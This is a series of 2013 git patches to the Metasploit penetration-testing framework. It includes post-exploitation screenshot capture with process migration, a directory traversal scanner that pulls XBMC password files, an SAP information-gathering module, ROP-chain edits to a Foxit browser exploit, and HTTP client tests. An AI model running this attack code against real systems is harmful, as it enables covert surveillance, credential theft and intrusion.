Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end - fd = ::File.new(screenshot, 'wb') - fd.write(data) - fd.close + # also write to disk temporarily so we can display in browser. They may or may not have been RECORDed. + if cmd # do this if they have not suppressed VIEW_CMD display + fd = ::File.new(screenshot, 'wb') + fd.write(data) + fd.close + end end - system(cmd) + system(cmd) if cmd end rescue ::Exception => e - print_error("Error taking screenshot: #{e.class} #{e} #{e.backtrace}") + print_error("Error taking or storing screenshot: #{e.class} #{e} #{e.backtrace}") return end print_status("Screen Spying Complete") - ::File.delete(screenshot) + if file_locations and not file_locations.empty? + print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot" + end + if cmd + # wait 2 secs so the last file can get opened before deletion + select(nil, nil, nil, 2) + begin + ::File.delete(screenshot) + rescue Exception => e + print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}") + print_error("This may be due to the file being in use if you are on a Windows platform") + end + end end def migrate_explorer From 6659459de57bc8eefee68a1d85be890cadaebc29 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 10:56:49 -0600 Subject: [PATCH 007/139] del Version ref and change platform windows -> win per sinner's comments, thanks sinner. --- modules/post/windows/gather/screen_spy.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 90a88eb02b..3ca16f439b 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -30,8 +30,7 @@ class Metasploit3 < Msf::Post 'kernelsmith ', # record/loot support,log x approach, nx 'Adrian Kubok' # better record file names ], - 'Version' => '$Revision$', - 'Platform' => ['windows'], # @todo add support for posix meterpreter somehow? + 'Platform' => ['win'], # @todo add support for posix meterpreter somehow? 'SessionTypes' => ['meterpreter'] )) From 32a5a009d63af5fca1fe02d9b5d5c33a0e9734a4 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 11:28:47 -0600 Subject: [PATCH 008/139] change loot type to image/jpg thanks egypt --- modules/post/windows/gather/screen_spy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 3ca16f439b..653abe9d9e 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post if datastore['RECORD'] # let's loot it using non-clobbering filename, even tho this is the source filename, not dest fn = "screenshot.%0#{leading_zeros}d.jpg" % num - file_locations << store_loot("screenspy.screenshot", "application/octet-stream", session, data, fn, "Screenshot") + file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot") #shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end From f649cd53ad2cdca7bd3a438ba56cee63a67af298 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 11:31:10 -0600 Subject: [PATCH 009/139] removed commented out code (again) thanks egypt --- modules/post/windows/gather/screen_spy.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 653abe9d9e..6d8a9f07cb 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Post # let's loot it using non-clobbering filename, even tho this is the source filename, not dest fn = "screenshot.%0#{leading_zeros}d.jpg" % num file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot") - #shot = Msf::Config.install_root + "/data/" + host + ".screenshot.%0#{leading_zeros}d.jpg" % num end # also write to disk temporarily so we can display in browser. They may or may not have been RECORDed. From e1c037e523824583a2c411cceab500024667c8f1 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 12:06:57 -0600 Subject: [PATCH 010/139] Better error handling --- modules/post/windows/gather/screen_spy.rb | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 6d8a9f07cb..126bb04892 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -87,7 +87,12 @@ class Metasploit3 < Msf::Post file_locations = [] count.times do |num| select(nil, nil, nil, datastore['DELAY']) - data = session.espia.espia_image_get_dev_screen + begin + data = session.espia.espia_image_get_dev_screen + rescue RequestError => e + print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}") + return false + end if data if datastore['RECORD'] # let's loot it using non-clobbering filename, even tho this is the source filename, not dest @@ -104,8 +109,8 @@ class Metasploit3 < Msf::Post end system(cmd) if cmd end - rescue ::Exception => e - print_error("Error taking or storing screenshot: #{e.class} #{e} #{e.backtrace}") + rescue IOError => e + print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}") return end print_status("Screen Spying Complete") From 345c5f32cc3c566b3eb3342b3b874365c435ece6 Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Wed, 30 Jan 2013 15:40:02 -0600 Subject: [PATCH 011/139] keep it from migrating more than once into explorer.exe thanks for noticing egypt we should add a migrate_explorer to the post api --- modules/post/windows/gather/screen_spy.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 126bb04892..7e03e2440e 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -137,9 +137,10 @@ class Metasploit3 < Msf::Post begin session.core.migrate(p['pid'].to_i) print_status("Migration successful") + return p['pid'] rescue print_status("Migration failed.") - return + return nil end end end From 2cdeca54225b092ee508bf9043b6fec2dcbb69d5 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Tue, 5 Feb 2013 14:32:50 -0500 Subject: [PATCH 012/139] Added reference & depth Added reference to IOActive's release. Added a depth option to allow user to specify how many folders to traverse. --- modules/auxiliary/scanner/http/xbmc_traversal.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/xbmc_traversal.rb b/modules/auxiliary/scanner/http/xbmc_traversal.rb index 2828421109..2f43b36077 100644 --- a/modules/auxiliary/scanner/http/xbmc_traversal.rb +++ b/modules/auxiliary/scanner/http/xbmc_traversal.rb @@ -31,6 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'], ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'], + ['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'], ], 'DisclosureDate' => "Nov 4 2012" )) @@ -39,6 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(8080), OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), OptString.new('USER', [true, 'The username to use for the HTTP server', 'xbmc']), OptString.new('PASS', [true, 'The password to use for the HTTP server', 'xbmc']), ], self.class) @@ -54,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary end # Create request - traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep + traversal = "../" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", From 039fd2b8853fc0deae8ecc522db41b21a2f8e105 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Feb 2013 15:54:40 -0600 Subject: [PATCH 013/139] Adds some light testing for Rex's HTTP client lib In light ofi PR #1476, it would be nice to have some basic, modern, maintained testing on Rex's HTTP Client proto library. My rspec fu is quite weak, of course, but this should cover the very basic cases. There are lots of pending holes, but hey, it's a start. --- lib/rex/proto/http/client.rb | 3 +- spec/lib/rex/proto/http/client.rb | 244 ++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+), 1 deletion(-) create mode 100644 spec/lib/rex/proto/http/client.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 760268a7f7..6159514399 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -420,7 +420,8 @@ class Client !(self.username.nil?) && self.username != '' end - # + alias :has_creds? :have_creds? + # Params - # res = The 401 response we need to auth from # opts = the opts used to generate the request that created this response diff --git a/spec/lib/rex/proto/http/client.rb b/spec/lib/rex/proto/http/client.rb new file mode 100644 index 0000000000..7555614842 --- /dev/null +++ b/spec/lib/rex/proto/http/client.rb @@ -0,0 +1,244 @@ +require 'rex/proto/http/client' + +# Note: Some of these tests require a failed +# connection to 127.0.0.1:1. If you have some crazy local +# firewall that is dropping packets to this, your tests +# might be slow. I wonder how Travis-CI will react to this... + +# Set a standard excuse that indicates that the method +# under test needs to be first examined to figure out +# what's sane and what's not. +def excuse_lazy(test_method=nil) + ret = "need to determine pass/fail criteria" + test_method ? ret << " for #{test_method.inspect}" : ret +end + +# Complain about not having a "real" connection (can be mocked) +def excuse_needs_connection + "need to actually set up an HTTP server to test" +end + +# Complain about not having a real auth server (can be mocked) +def excuse_needs_auth + "need to set up an HTTP authentication challenger" +end + +describe Rex::Proto::Http::Client do + + ip = "1.2.3.4" + + cli = Rex::Proto::Http::Client.new(ip) + it "should respond to intialize" do + cli.should be + end + + it "should have a set of default instance variables" do + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + cli.instance_variable_get(:@username).should be_empty + cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash + cli.config_types.should be_a_kind_of Hash + end + + it "should produce a raw HTTP request" do + cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + end + + it "should produce a CGI HTTP request" do + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + end + + it "should attempt to connect to a server" do + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) + expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused + end + + it "should be able to close a connection" do + cli.close.should be_nil + end + + it "should send a request and receive a response" do + # cli.send_recv + pending excuse_needs_connection + end + + it "should send a request and receive a response without auth handling" do + # cli._send_recv + pending excuse_needs_connection + end + + it "should send a request" do + # cli.send_request + pending excuse_needs_connection + end + + it "should test for credentials" do + cli.should_not have_creds + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + this_cli.should have_creds + end + + it "should send authentication" do + pending excuse_needs_connection + end + + it "should produce a basic authentication header" do + u = "user1" + p = "pass1" + b64 = ["#{u}:#{p}"].pack("m*").strip + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + end + + it "should perform digest authentication" do + # cli.digest_auth + pending excuse_needs_auth + end + + it "should perform negotiate authentication" do + # cli.negotiate_auth + pending excuse_needs_auth + end + + it "should get a response" do + # cli.read_response + pending excuse_needs_connection + end + + it "should end a connection with a stop" do + cli.stop.should be_nil + end + + it "should test if a connection is valid" do + cli.conn?.should be_false + end + + it "should tell if pipelining is enabled" do + cli.pipelining?.should be_false + this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) + this_cli.pipeline = true + this_cli.pipelining?.should be_true + end + + it "should return an encoded URI" do + pending excuse_lazy :set_encode_uri + end + + it "should return an encoded query string" do + pending excuse_lazy :set_encode_qa + end + + # These set_ methods all exercise the evasion opts, looks like + + it "should set and return the URI" do + pending excuse_lazy :set_uri + end + + it "should set and return the CGI" do + pending excuse_lazy :set_cgi + end + + it "should set and return the HTTP verb" do + pending excuse_lazy :set_method + end + + it "should set and return the version string" do + pending excuse_lazy :set_version + end + + it "should set and return the HTTP seperator and body string" do + pending excuse_lazy :set_body + end + + it "should set and return the path" do + pending excuse_lazy :set_path_info + end + + it "should set and return the whitespace between method and URI" do + pending excuse_lazy :set_method_uri_spacer + end + + it "should set and return the whitespace between the version and URI" do + pending excuse_lazy :set_uri_version_spacer + end + + it "should set and return padding before the URI" do + pending excuse_lazy :set_uri_prepend + end + + it "should set and return padding after the URI" do + cli.set_uri_append.should be_empty + end + + it "should set and return the host header" do + pending excuse_lazy :set_host_header + end + + it "should set and return the agent header" do + pending excuse_lazy :set_agent_header + end + + it "should set and return the cookie header" do + pending excuse_lazy :set_cookie_header + end + + + it "should set and return the content-type header" do + pending excuse_lazy :set_cookie_header + end + + it "should set and return the content-length header" do + pending excuse_lazy :set_content_len_header + end + + it "should set and return the basic authentication header" do + pending excuse_lazy :set_basic_auth_header + end + + it "should set and return any extra headers" do + pending excuse_lazy :set_extra_headers + end + + it "should set the chunked encoding header" do + pending excuse_lazy :set_chunked_header + end + + it "should set and return raw_headers" do + pending "#set_raw_headers() doesn't seem to actually do anything" + end + + it "should set and return a formatted header" do + pending :set_formatted_header + end + + it "should respond to its various accessors" do + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + cli.should respond_to :username + cli.should respond_to :password + cli.should respond_to :junk_pipeline + # These are supposed to be protected + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port + end + + # Not super sure why these are protected... + it "should refuse access to its protected accessors" do + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError + end + +end From ba7f5a72455cf28231a5a11bc4557bc274a09637 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Feb 2013 21:04:57 -0600 Subject: [PATCH 014/139] Actually run this spec. --- spec/lib/rex/proto/http/{client.rb => client_spec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename spec/lib/rex/proto/http/{client.rb => client_spec.rb} (100%) diff --git a/spec/lib/rex/proto/http/client.rb b/spec/lib/rex/proto/http/client_spec.rb similarity index 100% rename from spec/lib/rex/proto/http/client.rb rename to spec/lib/rex/proto/http/client_spec.rb From 5a0744934efc130e2f1b8da7a19d46448e166a04 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 11 Feb 2013 21:06:52 -0600 Subject: [PATCH 015/139] Let's not intro functionality as testing That's a bad habit to get into. --- lib/rex/proto/http/client.rb | 3 +-- spec/lib/rex/proto/http/client_spec.rb | 7 ++++--- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 6159514399..760268a7f7 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -420,8 +420,7 @@ class Client !(self.username.nil?) && self.username != '' end - alias :has_creds? :have_creds? - + # # Params - # res = The 401 response we need to auth from # opts = the opts used to generate the request that created this response diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 7555614842..de8c68f186 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -77,9 +77,10 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - cli.should_not have_creds - this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) - this_cli.should have_creds + # cli.should_not have_creds + # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) + # this_cli.should have_creds + pending "Should actually respond to :has_creds" end it "should send authentication" do From 3a6cd6f395bb62b9c5d6f3a4b9da4e214de75b91 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Tue, 12 Feb 2013 14:42:59 +0100 Subject: [PATCH 016/139] Added module for requesting RFC_SYSTEM_INFO via ICF web interface --- .../scanner/sap/sap_icf_rfc_system_info.rb | 290 ++++++++++++++++++ 1 file changed, 290 insertions(+) create mode 100644 modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb new file mode 100644 index 0000000000..dd47aaa5c7 --- /dev/null +++ b/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb @@ -0,0 +1,290 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +## +# This module is based on, inspired by, or is a port of a plugin available in +# the Onapsis Bizploit Opensource ERP Penetration Testing framework - +# http://www.onapsis.com/research-free-solutions.php. +# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts +# in producing the Metasploit modules and was happy to share his knowledge and +# experience - a very cool guy. I'd also like to thank Chris John Riley, +# Ian de Villiers and Joris van de Vis who have Beta tested the modules and +# provided excellent feedback. Some people just seem to enjoy hacking SAP :) +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SAP /sap/public/info RFC_SYSTEM_INFO Function Sensitive Information Gathering', + 'Description' => %q{ + This module uses the RFC_SYSTEM_INFO function within SAP Internet Communication + Framework (ICF) to obtain the operating system version, SAP version, IP address + and other information through /sap/public/info + + }, + 'Author' => + [ + # original sap_soap_rfc_system_info module + 'Agnivesh Sathasivam', + 'nmonkee', + # repurposed for /sap/public/info (non-RFC) + 'ChrisJohnRiley' + ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [true, 'Path to SAP Application Server', '/']) + ], self.class) + end + + def run_host(ip) + + print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") + uri = normalize_uri(datastore['PATH'] + '/sap/public/info') + begin + res = send_request_raw({ 'uri' => uri }, 20) + if res and res.code != 200 + print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") + return + end + rescue ::Rex::ConnectionError + print_error("[SAP] #{ip}:#{rport} - Unable to connect") + return + end + + print_status("[SAP] #{ip}:#{rport} - Response received") + + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' =>[ + "Key", + "Value" + ]) + response = res.body + rfcproto = $1 if response =~ /(.*)<\/RFCPROTO>/i + rfcchartyp = $1 if response =~ /(.*)<\/RFCCHARTYP>/i + rfcinttyp = $1 if response =~ /(.*)<\/RFCINTTYP>/i + rfcflotyp = $1 if response =~ /(.*)<\/RFCFLOTYP>/i + rfcdest = $1 if response =~ /(.*)<\/RFCDEST>/i + rfchost = $1 if response =~ /(.*)<\/RFCHOST>/i + rfcsysid = $1 if response =~ /(.*)<\/RFCSYSID>/i + rfcdbhost = $1 if response =~ /(.*)<\/RFCDBHOST>/i + rfcdbsys = $1 if response =~ /(.*)<\/RFCDBSYS>/i + rfcsaprl = $1 if response =~ /(.*)<\/RFCSAPRL>/i + rfcmach = $1 if response =~ /(.*)<\/RFCMACH>/i + rfcopsys = $1 if response =~ /(.*)<\/RFCOPSYS>/i + rfctzone = $1 if response =~ /(.*)<\/RFCTZONE>/i + rfcdayst = $1 if response =~ /(.*)<\/RFCDAYST>/i + rfcipaddr = $1 if response =~ /(.*)<\/RFCIPADDR>/i + rfckernrl = $1 if response =~ /(.*)<\/RFCKERNRL>/i + rfcipv6addr = $1 if response =~ /(.*)<\/RFCIPV6ADDR>/i + + saptbl << [ "Release Status of SAP System", rfcsaprl ] + saptbl << [ "RFC Log Version", rfcproto ] + saptbl << [ "Kernel Release", rfckernrl ] + saptbl << [ "Operating System", rfcopsys ] + saptbl << [ "Database Host", rfcdbhost] + saptbl << [ "Central Database System", rfcdbsys ] + + if rfcinttyp == 'LIT' + saptbl << [ "Integer Format", "Little Endian" ] + else + saptbl << [ "Integer Format", "Big Endian" ] + end + saptbl << [ "Hostname", rfchost ] + + if rfcflotyp == 'IE3' + saptbl << [ "Float Type Format", "IEEE" ] + else + saptbl << [ "Float Type Format", "IBM/370" ] + end + + saptbl << [ "IPv4 Address", rfcipaddr ] + saptbl << [ "IPv6 Address", rfcipv6addr ] + saptbl << [ "System ID", rfcsysid ] + saptbl << [ "RFC Destination", rfcdest ] + saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ] + saptbl << [ "Character Set", rfcchartyp ] + saptbl << [ "Daylight Saving Time", rfcdayst ] + saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] + # output table + print(saptbl.to_s) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.release', + :data => "Release Status of SAP System: #{rfcsaprl}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.rfc_log', + :data => "RFC Log Version: #{rfcproto}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'sap.version.kernel', + :data => "Kernel Release: #{rfckernrl}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :sname => 'sap', + :type => 'system.os', + :data => "Operating System: #{rfcopsys}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.db.hostname', + :data => "Database Host: #{rfcdbhost}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.db_system', + :data => "Central Database System: #{rfcdbsys}" + ) + + if rfcinttyp == 'LIT' + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.endianness', + :data => "Integer Format: Little Endian" + ) + else + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.endianness', + :data => "Integer Format: Big Endian" + ) + end + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.hostname', + :data => "Hostname: #{rfchost}" + ) + + if rfcflotyp == 'IE3' + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.float_type', + :data => "Float Type Format: IEEE" + ) + else + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.float_type', + :data => "Float Type Format: IBM/370" + ) + end + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.ip.v4', + :data => "IPv4 Address: #{rfcipaddr}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.ip.v6', + :data => "IPv6 Address: #{rfcipv6addr}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.instance', + :data => "System ID: #{rfcsysid}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.rfc.destination', + :data => "RFC Destination: #{rfcdest}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.timezone', + :data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'system.charset', + :data => "Character Set: #{rfcchartyp}" + ) + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.daylight_saving_time', + :data => "Daylight Saving Time: #{rfcdayst}" + ) + + + report_note( + :host => ip, + :proto => 'tcp', + :port => rport, + :type => 'sap.machine_id', + :data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}" + ) + end +end \ No newline at end of file From ff13a9fb1fd122b9f698ad89f59b1b917a96cb24 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 13 Feb 2013 14:03:10 -0600 Subject: [PATCH 017/139] Randomize some gadgets --- .../browser/foxit_reader_plugin_url_bof.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 7e5d6353a3..f7ece6273a 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -92,6 +92,10 @@ class Metasploit3 < Msf::Exploit::Remote return nil end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end + # Uses rop chain from npFoxitReaderPlugin.dll (foxit) (no ASLR module) def win7_rop_chain @@ -103,18 +107,18 @@ class Metasploit3 < Msf::Exploit::Remote 0x1000f055, # MOV EAX,DWORD PTR DS:[EAX] # RETN [npFoxitReaderPlugin.dll] 0x10021081, # PUSH EAX # POP ESI # RETN 0x04 [npFoxitReaderPlugin.dll] 0x10007971, # POP EBP # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) 0x1000614c, # & push esp # ret [npFoxitReaderPlugin.dll] 0x100073fa, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00001000, # 0x00001000-> edx 0x1000d9ec, # XOR EDX, EDX # RETN 0x1000d9be, # ADD EDX,EBX # POP EBX # RETN 0x10 [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (compensate) + jun, # Filler (compensate) 0x100074a7, # POP ECX # RETN [npFoxitReaderPlugin.dll] - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) - 0x41414141, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) + junk, # Filler (RETN offset compensation) 0x00000040, # 0x00000040-> ecx 0x1000e4ab, # POP EBX # RETN [npFoxitReaderPlugin.dll] 0x00000001, # 0x00000001-> ebx From 8a91f0d7ecc48ece4cfd3154972ec44ef4884ecb Mon Sep 17 00:00:00 2001 From: kernelsmith Date: Thu, 14 Feb 2013 14:04:45 -0600 Subject: [PATCH 018/139] rescue ENOENT as well --- modules/post/windows/gather/screen_spy.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index 7e03e2440e..5f1e1eb505 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Post end system(cmd) if cmd end - rescue IOError => e + rescue IOError, Errno::ENOENT => e print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}") return end From dd26b081976491bf91a89eaa08c9a9db3bf001e5 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 19:25:27 -0600 Subject: [PATCH 019/139] first run at Clientrequest object need a reliable object class for request_raw and request_cgi so that we can manipulate requests in a safe and sane manner. It is not a eprfect solution, but should fix what we need for the auth work. --- lib/rex/proto/http.rb | 1 + lib/rex/proto/http/client.rb | 444 ++------------------------ lib/rex/proto/http/client_request.rb | 454 +++++++++++++++++++++++++++ 3 files changed, 480 insertions(+), 419 deletions(-) create mode 100644 lib/rex/proto/http/client_request.rb diff --git a/lib/rex/proto/http.rb b/lib/rex/proto/http.rb index 1ff65061ec..85a4f31e3c 100644 --- a/lib/rex/proto/http.rb +++ b/lib/rex/proto/http.rb @@ -4,3 +4,4 @@ require 'rex/proto/http/request' require 'rex/proto/http/response' require 'rex/proto/http/client' require 'rex/proto/http/server' +require 'rex/proto/http/client_request' \ No newline at end of file diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 75ba1f9574..690cd58f4d 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -240,103 +242,32 @@ class Client # # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] - c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' - c_varg = opts['vars_get'] || {} - c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] = opts['version'] || config['version'] || '1.1' + 